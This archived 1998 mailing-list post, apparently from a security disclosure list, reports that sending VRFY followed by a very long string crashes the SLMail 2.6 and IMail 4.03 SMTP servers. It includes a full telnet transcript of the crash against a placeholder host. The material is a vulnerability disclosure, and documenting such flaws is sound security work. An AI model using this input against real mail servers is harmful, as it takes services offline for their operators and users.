SLMail 2.6 DoS - Imail also

From: Jon (stevenat_private)
Date: Wed Mar 11 1998 - 18:22:52 PST

  • Next message: Development Team: "Problems with MDaemon 2.7.1"

    I had wrote earlier:
    
    >
    > Hello,
    >
    >         I have recently found a quite serious DoS attack for the SLMail
    > 2.6 email daemon (www.seattlelabs.com/slmail). A long string of text
    > after a command makes the program crash.  I have only tested this on
    > 2.6, so I'm not sure if other versions are vulnerable.
    >
    > craphole:~$ telnet www.victim.com 25
    > Trying 555.55.555.55...
    > Connected to www.victim.com.
    > Escape character is '^]'.
    > 220 www.victim.com Smtp Server SLMail v2.6 Ready ESMTP spoken here
    > vrfy
    > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    > dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    > Connection closed by foreign host.
    >
    > craphole:~$ telnet www.victim.com 25
    > Trying 555.55.555.55...
    > telnet: Unable to connect to remote host: Connection refused
    > craphole:~$
    >
    >         It will stay unresponsive until manually restarted. I haven't
    > mailed Seattle Labs about this, but I'm sure they'll figure it out.
    >
    > Later,
    >
    > Cisc0 @ Undernet
    > stevenat_private
    
    
    
    Out of boredom, I tried another smtp daemon for Windows, IMail (I tried
    4.03) by IPSwitch (www.ipswitch.com). Which crashed the same way. Pretty
    strange, I've only tried two windowsNT smtp daemons, and both crashed
    the same way...
    
    Cisc0 @ Undernet
    stevenat_private
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:44:57 PDT